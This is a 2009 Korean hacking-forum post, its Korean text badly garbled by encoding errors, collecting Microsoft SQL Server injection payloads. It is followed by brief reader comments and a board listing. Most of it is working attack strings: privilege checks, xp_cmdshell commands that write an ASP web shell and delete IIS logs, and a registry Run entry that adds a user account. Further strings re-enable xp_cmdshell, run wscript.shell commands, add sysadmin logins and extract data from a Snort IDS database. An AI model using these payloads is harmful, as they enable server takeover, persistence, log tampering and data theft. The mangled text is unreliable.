1581, 21/80 ȸ¿ø°¡ÀÔ  ·Î±×ÀΠ 
   subroutine
   http://blog.naver.com/31337__
   sql ÀÎÁ§¼Ç °ø°Ý±â¹ý

http://www.hackerschool.org/HS_Boards/zboard.php?id=Free_Lectures&no=1177 [º¹»ç]


#########################################
# SQL Injection¿¡ ÀÇÇØ ÀÚÁÖ »ý¼ºµÇ´Â Å×ÀÌºí ¸í
#########################################
D99_CMD, D99_REG, D99_Tmp, DIY_TEMPCOMMAND_TABLE, t_jiaozhu, Siwebtmp,
NB_Commander_Tmp, comd_list, Reg_Arrt,  jiaozhu, Reg_Arrt, xiaopan, DIY_TEMPTABLE,
heige, kill_kk, SC_LOG, SC_TRAN



########################################
# CHECK
#########################################

and 1=(select @@version) //version

and 1=(IS_SRVROLEMEMBER('sysadmin')) // Àüü ±ÇÇÑ(sysadmin£¬dbcreator£¬diskadmin£¬processadmin£¬serveradmin£¬setupadmin£¬securityadmin)
and 1=(IS_MEMBER('db_owner')) // ÇØ´ç DB ±ÇÇÑ

;declare @a int;--  // »ç¿ë¿©ºÎ
and 0<>db_name() // DB¸í
and user>0 // USER¸í

#########################################
# Áß±¹ ÇØÄ¿µéÀÌ ¾Ö¿ëÇÏ´Â °ø°ÝÆÐÅÏ
#########################################

;exec master.dbo.xp_cmdshell 'echo ^<script language=VBScript runat=server^>execute request^("l"^)^</script^> >c:\mu.asp';-- // File
;exec master.dbo.xp_cmdshell 'del C:\winnt\system32\logfiles\W3SVC5\ex050718.log >c:\temp.txt' // LOG
;exec master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Run','help1','REG_SZ','cmd.exe /c net user test ptlove /add' // Registry

DROP TABLE kill_kk;CREATE TABLE kill_kk(subdirectory VARCHAR(100)À¬
depth VARCHAR(100)À¬[file] VARCHAR(100)) Insert kill_kk
exec master..xp_dirtree "D:/"À¬ 1À¬1-- // Table »ý¼º

DECLARE @shell INT DECLARE @fso INT DECLARE @file INT DECLARE @isEnd BIT DECLARE @out VARCHAR(400) EXEC sp_oacreate 'wscript.shell',@shell output EXEC sp_oamethod @shell,'run',null,'cmd.exe /c cscript C:\Inetpub\AdminScripts\adsutil.vbs set /W3SVC/InProcessIsapiApps "C:\WINNT\system32\idq.dll" "C:\WINNT\system32\inetsrv\httpext.dll" "C:\WINNT\system32\inetsrv\httpodbc.dll" "C:\WINNT\system32\inetsrv\ssinc.dll" "C:\WINNT\system32\msw3prt.dll" "C:\winnt\system32\inetsrv\asp.dll">c:\temp.txt','0','true' EXEC sp_oacreate 'scripting.filesystemobject',@fso output EXEC sp_oamethod @fso,'opentextfile',@file out,'c:\temp.txt' WHILE @shell>0 BEGIN EXEC sp_oamethod @file,'Readline',@out out INSERT INTO MYTMP(info) VALUES (@out) EXEC sp_oagetproperty @file,'AtEndOfStream',@isEnd out IF @isEnd=1 BREAK ELSE CONTINUE END

#########################################
# °ø°Ý ½Ã³ª¸®¿À
#########################################

;DROP TABLE [X_5450];use master dbcc addextendedproc('xp_cmdshell','xplog70.dll')--

And (Select Top 1 CASE WHEN ResultTxt is Null then char(124) else ResultTxt+char(124) End from (Select Top 1 id,ResultTxt from [X_5450] order by [id]) T order by [id] desc)>0


;use master dbcc addextendedproc('xp_cmdshell','xplog70.dll')--

;CREATE TABLE [X_5450]([id] int NOT NULL IDENTITY (1,1), [ResultTxt] nvarchar(4000) NULL);insert into [X_5450](ResultTxt) exec master.dbo.xp_cmdshell 'dir c:';insert into [X_5450] values ('g_over');exec master.dbo.sp_dropextendedproc 'xp_cmdshell'--

;use master declare @o int exec sp_oacreate 'wscript.shell',@o out exec sp_oamethod @o,'run',NULL,'OSQL -E -S localhost -d master -Q "exec sp_addsrvrolemember dir c:,sysadmin"'--

;use master declare @o int exec sp_oacreate 'wscript.shell',@o out exec sp_oamethod @o,'run',NULL,'OSQL -E -S localhost -d master -Q "exec sp_addlogin dir c:,xiaoxue"'--

;DROP TABLE [X_5450];use master dbcc addextendedproc('xp_cmdshell','xplog70.dll')--

#########################################
# ±âŸ Äõ¸®¹®
#########################################

¸ðµç db¸í Äõ¸®Çϱâ
and 1=(select name from master.dbo.sysdatabases where dbid=7)
and 1=(select name from master.dbo.sysdatabases where dbid=8)

ƯÁ¤db¿¡¼­ »ç¿ëÀÚ°¡ ¸¸µç Å×À̺í¸í ºÒ·¯¿À±â
and 0<>(select top 1 name from snortids.dbo.sysobjects where xtype=char(85))
and 0<>(select top 1 name from (select top ÇàÁõ°¡ name from .dbo.sysobjects where xtype='U' order by name asc) as table1 order by name desc)

Å×À̺íÀÇ Ä÷³Á¤º¸ ºÒ·¯¿À±â

ƯÁ¤ Å×À̺í°íÀ¯ID °¡Á®¿À±â(char(97)+char(98)+char(99)=abc) 1061578820
and 0<>(select count(*) from snortids.dbo.sysobjects where xtype='U' and name=char(97)+char(99)+char(105)+char(100)+char(95)+char(101)+char(118)+char(101)+char(110)+char(116) and uid>(str(id)))

Ä÷³¸í °¡Á®¿À±â
and 0<>(select top 1 name from snortids.dbo.syscolumns where id=1061578820)
and 0<>(select top 1 name from (select top ÇàÁõ°¡ name from snortids.dbo.syscolumns where id=1061578820 order by name asc) as table1 order by name desc)

µ¥ÀÌÅÍ °¡Á®¿À±â
and 0<>(select top 1 char(94)+Cast(sig_name as varchar(8000))+char(94) from SnortIDS..acid_event)
and 0<>(select top 1 char(94)+Cast(Ä÷³¸í as varchar(8000))+char(94) from SnortIDS..acid_event where Ä÷³¸í not in('À̹̾òÀº³»¿ë'))
and 0<>(select top 1 char(94)+Cast(Ä÷³¸í as varchar(8000))+char(94) from (select top Çà¼ö Ä÷³¸í from SnortIDS.dbo.acid_event order by Ä÷³¸í asc) as table1 order by Ä÷³¸í desc)

-subroutine-

  Hit : 19117     Date : 2009/01/11 01:52



    
BHM D99_CMD, D99_REG, D99_Tmp, DIY_TEMPCOMMAND_TABLE, t_jiaozhu, Siwebtmp,
NB_Commander_Tmp, comd_list, Reg_Arrt, jiaozhu, Reg_Arrt, xiaopan, DIY_TEMPTABLE,
heige, kill_kk, SC_LOG, SC_TRAN -- ´ëºÎºÐÀÌ ä¹D,NB ¶õ Åø¿¡¼­ »ý¼ºµÈ Å×À̺í¸íÀ̱º...ÂÁÂÁ
2009/01/19  
zhuji90 ¹«½¼ ¾ð¾îÀΰ¡¿ä...? 2009/02/09  
ÆÒ´õ°íÀº ¤·¤µ¤·..½Å±âÇϳ׿ä 2009/07/10  
xodnr631 »ì¦ ÀÐÀ»¸¸ Çϳ׿ä, °¨»çÇÕ´Ï´Ù. 2010/09/24  
1181   sdsdfdfgfh[4]     witched14
11/06 37695
1180   ³×Æ®¿öÅ© ÇØÅ· ½ºÅ͵ð ÇϽǺРã¾Æ¿©[6]     kiriro
11/04 39112
1179   bufffer over flow [BOF] test     ÇØÄ¿ Hades
10/24 38888
1178   ³×Æ®¿öÅ© ±âº»¿ë¾î[7]     chlckdghsla
10/14 45336
1177   ¸®´ª½º ±âº»¸í·É¾î~[6]     chlckdghsla
10/14 54121
1176   net send°¡ ¾ÈµÇ¿ä[2]     dldvk9999
10/11 38492
1175   ¾Æ±Û±¸¿ä[3]     dldvk9999
10/11 38312
1174   ¸· °£Áö³ª°Ô ÇØÅ·ÇÏ°í½Í¾î¿ä[14]     dldvk9999
10/11 41022
1173   [Á¤º¸] ÄÄÇ»ÅÍ ÀÚ°ÝÁõ ±âÃâ¹®Á¦ ¸ðÀ½ ÇÁ·Î±×·¥[5]     inwoox
09/26 40180
1172   Ç÷¡½¬¸¦ ÀÌ¿ëÇÑ xss ÇØÅ·[3]     4irjuno
09/23 41454
1171   ¹éÆ®·¢5 »ç¿ë¹ý/ÀÚ¼¼È÷Á» ¾Ë·ÁÁÖ¼¼¿ä[3]     cswcys
09/20 43385
1170   [CTF] ³»°¡ ´©±ºÁö ¾Æ´Ï?     4irjuno
09/09 40040
1169   [CTF] ½´ÆðÔÀÓÀÌ Á¶¾Æ¿ä.     4irjuno
09/09 40363
1168   [CTF] ±â±«ÇÑ À½¾Ç Ç®ÀÌ[3]     4irjuno
09/09 42203
1167   [CTF]Ä¿½ºÅÒ À¥ ºê¶ó¿ìÁ® Ç®ÀÌ     4irjuno
09/09 39942
1166   [Á¤º¸] À©µµ¿ì ´Þ·Â ÇÁ·Î±×·¥[3]     4irjuno
09/09 41459
1165   Á¦ ³×ÀÌÆ®¿Â ÁÖ¼Ò (ÇØÄ· cpu ¹ßÇ¥)...[6]     aalswn
09/02 38507
1164   ÅÚ³ÝÀÌ¾ÈµÇ ÀÌ»óÇÏ°Ô¶ä[2]     dygks3157
09/02 37520
1163     [re] ÅÚ³ÝÀÌ¾ÈµÇ ÀÌ»óÇÏ°Ô¶ä[1]     enrjfenrjf
05/10 33776
1162   ÅÚ³ÝÀ̾ȵé¾î°¡Á®¿©[3]     dygks3157
08/28 39701
[1].. 21 [22][23][24][25][26][27][28][29][30]..[80]

Copyright 1999-2024 Zeroboard / skin by Hackerschool.org / Secure Patch by Hackerschool.org